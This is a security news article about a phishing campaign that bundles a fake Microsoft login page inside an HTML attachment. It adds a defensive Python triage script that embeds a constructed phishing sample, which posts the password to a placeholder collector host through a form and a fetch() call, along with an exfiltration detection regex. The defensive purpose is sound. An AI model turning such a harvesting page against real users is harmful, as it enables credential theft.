Source: Cyware | By Ryan Stewart
• Researchers have spotted a new phishing campaign that steals credentials. However, this campaign is different from the commonly observed ones.
• The email used in this campaign contains the traditional payment notice phishing text.
How is this scam different?
This newly spotted credential phishing campaign does not redirect victims to another site for login, as most phishing campaigns do.
• Instead, it bundles the scam’s landing page in the HTML attachment to prevent users from getting suspicious.
• Phishing scams can usually be detected through suspicious links and landing pages. This scam avoids these altogether and opts for a self-contained webpage that steals credentials.
• By doing this, the malicious actors behind the campaign are reducing the chances of the landing page being discovered and subsequently removed.
• The attachment is said to have all files and libraries required for harvesting credentials and relies on a remote server only to collect the stolen information.
“The HTML attachment it carried, however, turned out to be anything but usual. When HTML attachments are used in a credentials-stealing phishing, the HTML code usually either redirects the browser to a fake login page, or it directly loads the fake login page from a source on the internet. This HTML page turned out not to do either of those,” says ISC Handler Jan Kopriva.
How does it work?
When the victim opens the attachment in the email, a Microsoft Docs login form is rendered directly in the browser.
• The form provides a number of options to log in, including Gmail, Yahoo, and Office 365, among others.
• When the victim unknowingly enters credentials, the malicious script harvests the information and then redirects to a remote site with a fake payment invoice.
• Even if the victim later realizes that this is a phishing page, it makes no difference, because the credentials have already been harvested.
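Because the page arrives as a local HTML file rather than a link, URL reputation alone will not catch it; what a mail gateway or triage analyst can look for instead is the combination described above: a password form rendered locally whose data goes to a remote host. The following is an added example (not code from the article or from the ISC write-up) of that heuristic in Python, using only the standard library. The attachment it scans is a constructed sample, and the hostnames in it (`collector.example.invalid`, `invoice.example.invalid`) are placeholders, not indicators from the campaign.

```python
"""Heuristic triage of an HTML e-mail attachment for self-contained credential
harvesting: a login form rendered locally whose submission target is remote.
Added example; hostnames below are constructed placeholders, not real IoCs."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: renders its own login form and sends the fields to a
# remote collector, then bounces the browser to a decoy invoice page.
SAMPLE_ATTACHMENT = """<html><body>
<h2>Document sign-in</h2>
<form id="login" method="post" action="https://collector.example.invalid/post.php">
  <select name="provider"><option>Office 365</option><option>Gmail</option></select>
  <input type="email" name="user">
  <input type="password" name="pass">
  <input type="submit" value="View document">
</form>
<script>
document.getElementById('login').onsubmit = function () {
  fetch('https://collector.example.invalid/post.php', {method: 'POST'});
  window.location = 'https://invoice.example.invalid/';
};
</script>
</body></html>"""

# Constructed benign attachment for contrast: no password field at all.
BENIGN_NEWSLETTER = "<html><body><p>Hello</p><a href='https://example.com'>Read</a></body></html>"


class _FormScanner(HTMLParser):
    """Collects form targets, password inputs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.form_actions = []      # action= attribute of every <form>
        self.password_inputs = 0    # number of <input type="password">
        self.scripts = []           # bodies of inline <script> blocks
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


_URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")
_EXFIL_RE = re.compile(r"\b(fetch|XMLHttpRequest|\.submit|navigator\.sendBeacon)\b")


def remote_hosts(urls):
    """Hostnames of the absolute http(s) URLs in `urls`, relative ones ignored."""
    return {urlparse(u).hostname for u in urls if u.startswith(("http://", "https://"))}


def triage_html_attachment(html):
    """Return findings; 'verdict' is True when the attachment renders a password
    form locally and either posts it to a remote host or scripts a remote send."""
    p = _FormScanner()
    p.feed(html)
    script_text = "\n".join(p.scripts)
    findings = {
        "password_inputs": p.password_inputs,
        "form_hosts": sorted(h for h in remote_hosts(p.form_actions) if h),
        "script_hosts": sorted(h for h in remote_hosts(_URL_RE.findall(script_text)) if h),
        "script_exfil_hint": bool(_EXFIL_RE.search(script_text)),
    }
    findings["verdict"] = findings["password_inputs"] > 0 and bool(
        findings["form_hosts"] or (findings["script_exfil_hint"] and findings["script_hosts"])
    )
    return findings


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_ATTACHMENT), ("benign", BENIGN_NEWSLETTER)):
        print(name, triage_html_attachment(doc))
```

The check deliberately keys on structure rather than on any particular brand logo or hostname, since the attachment carries everything it needs locally and only the collection endpoint is remote; the `form_hosts` and `script_hosts` it extracts are the values worth feeding into blocklists or a sandbox's network policy.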
Although this isn’t the first phishing campaign to use this technique, security experts say that it is one of the few to contain such a complex HTML attachment.